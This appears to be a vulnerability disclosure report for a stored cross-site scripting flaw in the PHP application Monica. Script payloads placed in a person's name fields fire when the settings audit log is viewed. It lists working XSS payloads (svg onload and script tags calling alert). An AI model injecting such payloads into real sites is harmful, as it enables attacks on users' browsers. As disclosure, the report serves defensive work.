monica

vulnerability cross-site scripting (xss)
severity 7.2
language php
registry other

Description

XSS queries being triggered from people info page by the audit log at the settings.

POC

  • adding people info filled with payloads fig1
  • Triggering payload fig2

PoC

Payloads Used

< <svg/onload=alert("firstname1")><script> alert("firstname2_xss")</script> <script> alert("midname_xss")</script> <script> alert("Lname_xss")</script><svg/onload=alert(1)> (<svg/onload=alert("nickie1")>)